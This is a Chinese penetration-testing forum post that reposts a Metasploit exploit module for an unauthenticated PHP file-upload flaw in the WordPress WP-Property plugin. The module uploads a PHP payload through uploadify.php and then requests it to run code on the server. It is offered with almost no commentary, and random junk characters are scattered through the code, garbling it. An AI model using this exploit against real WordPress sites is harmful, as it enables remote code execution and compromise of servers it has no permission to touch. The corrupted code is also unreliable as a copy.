找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress WP-Property PHP 文件上传漏洞
返回列表 发新帖
查看: 2886|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞
& Z6 s1 \/ ^% @6 k" a
5 n+ i2 E0 J! r' A+ `2 ~ ## # This file is part of the Metasploit Framework and may be subject to
, y9 t$ Z( v! N5 l! \8 f( C" M: x7 R& O
# redistribution and commercial restrictions. Please see the Metasploit
! r, l& k4 q) v2 b6 T3 i# |3 [# O- P' A) O5 I2 A$ C# K- P2 H
# Framework web site for more information on licensing and terms of use.7 m. m: w0 W4 ?! z

' _2 H1 V3 @2 k  ?#   http://metasploit.com/framework/ ##& A9 M. ?& v7 f/ p
. x" c( j! ]5 C/ R

# W6 f1 L7 C' W! B+ q. v
: E" p1 M. f! F# s) r# O$ }4 y
+ D; {% t1 y7 @+ h' O- {1 r+ A/ B4 f# t3 N" q3 u8 r% e
require 'msf/core'
; R6 ]/ _  K% }9 I" yrequire 'msf/core/exploit/php_exe'
; i2 e+ |) Q; l; ]- X5 \
' v; L5 ]; d& ?class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
4 O0 i- E; R6 I'Description'    => %q{) e3 R4 @5 V8 L5 C  O6 a/ k$ O
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>  h9 w5 p( ?5 {
[
' ~, n2 p8 u9 X7 u8 g$ C3 \'Sammy FORGIT', # initial discovery
: e, ]2 H- K' n7 Z'James Fitts <fitts.james[at]gmail.com>' # metasploit module
3 U4 Z4 `( a  O2 }2 `],
: x% ]5 E! Q- C( k! X'License'        => MSF_LICENSE,
+ K- ^* o9 J- F- ]8 K: U/ T4 Y4 w'References'     =>! T8 Z! L1 J, H, {* b9 T& D* F
[3 u, d1 n" U! r& q% N, w5 ~3 M
[ 'OSVDB', '82656' ],
  k: q' i& |* W3 G& V[ 'BID', '53787' ],5 u; ~" _% w( B$ X" s3 S! S
[ 'EDB', '18987'],& Q/ a( n$ N$ q: F/ A
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]& l/ |) R4 S& @! Q6 R/ W
],$ C5 h' @$ ]2 X- O: J4 u& Q
'Payload'        =>
1 [  j, z  L. \2 U{
7 N8 x/ ]! S- r  c, o'BadChars' => "\x00"," |! e, Q& V+ d4 l8 D! K3 h6 j& p
},4 J9 G# M) D, y* W$ b  t' [) Q0 ^
'Platform'       => 'php',/ t! l' l% s5 V5 i
'Arch'           => ARCH_PHP,
8 [: X7 {1 D4 K0 H, V4 _'Targets'        =>" ?, b9 R2 `! n+ {/ N) @
[
$ E) g; |# U5 M[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],, B" s' e7 ?9 N! e% f
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
  p- h- g7 d+ q- u4 r2 K/ A4 u],
- B* T" i2 u* m4 c0 q1 o'DefaultTarget'  => 0,$ `. Z9 f$ c6 Q0 a- @" m+ l2 M
'DisclosureDate' => 'Mar 26 2012'))5 ~/ `& ~0 x: P
+ j& j! y) S: v  W6 L
register_options(% m/ r9 m7 U/ `, c9 I+ I
[
* p4 J/ S: V2 ^% Y8 U# IOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])3 V# Y* s$ s) K- n' n6 p( t
], self.class)
0 V# z  Y. B& V6 ]end
% F0 \) s# `9 @* b6 v: o6 p
1 ~" H; T7 W2 u! w9 S: hdef check
7 S- m; o2 G. J" R1 s, |uri =  target_uri.path
+ T# X3 q$ D' t& J0 uuri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',
8 u. t$ g& Q# m. k'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"' G" h$ D" I& Z8 X2 Y
})
7 g$ p6 y( ^& f  h; l/ T: v$ H, k2 C
if not res or res.code != 200; v/ [1 x! Y1 d9 g3 t  X
return Exploit::CheckCode::Unknown
; h3 h' J+ p# N' v' Xend
0 {8 B9 y$ R1 [& H" A9 [  r7 J* r6 L, b2 V! S4 z9 D2 u; v
return Exploit::CheckCode::Appears
' z- C  q# N: @9 wend
) `! C! ^& S4 P6 ~7 |. a& B3 \1 ~" r: a
0 ^, ]( w9 t# ]( qdef exploit
7 Q2 M2 u2 K# D# Quri =  target_uri.path
# {4 _3 F! ~+ M! r# T/ g% S8 I  Puri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)' _6 u8 d8 J+ e* O! \4 f
: r+ `7 ^0 m% n5 y) U
data = Rex::MIME::Message.new
8 n1 E2 N* X; e# udata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
/ ^4 A4 `) U8 jdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
: `- N+ f7 v; K6 [4 Epost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')8 k4 c) j# g! S& j

! G' F4 S& }/ Q3 z+ `print_status("#{peer} - Uploading payload #{@payload_name}")
6 M" c9 K, U  S, T, _5 V2 Ures = send_request_cgi({3 ~* K/ Q4 {: J. d+ k
'method' => 'POST',
2 }- P5 c5 W- I) @+ `'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",4 x5 u5 w) \. d1 L7 W: j" B8 I
'ctype'  => "multipart/form-data; boundary=#{data.bound}",$ S- B# a3 b  a) Y
'data'   => post_data. L6 |% f" A1 C
})8 n, ?  ?, r; n) Z2 c: G

: _+ ?+ M* a$ [' n+ vif not res or res.code != 200 or res.body !~ /#{@payload_name}/
  x! L: ^; m, E2 p+ n5 z/ v& kfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
) N1 d; j: j6 O: n% `end' Z; H- R* k: n0 H2 }
% `' ~" [2 ^6 R; G$ e- r
upload_uri = res.body/ C2 J( N4 l9 _0 [" O

0 L/ z/ E" e# R: _2 p6 iprint_status("#{peer} - Executing payload #{@payload_name}")& L+ g5 G: u! Z9 N( x6 Q
res = send_request_raw({
, d: r. K8 P" g5 M- ]- ~* E; e6 {: I'uri'    => upload_uri,
$ V7 \# {* q( b! J3 g3 ^6 Y'method' => 'GET': ~8 R- w3 ~2 D# S" J" m5 [
})' ?, H  {) _9 \
end
4 J- D5 A8 l3 I9 [end
1 U7 \* P- }8 S
5 L3 V. n" A! r1 r不要问我这写的是什么 怎么利用 我是说msf.1 K: _1 d" y* G! d8 w
! ~9 w* @6 z! ~+ E. ?" O& n
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表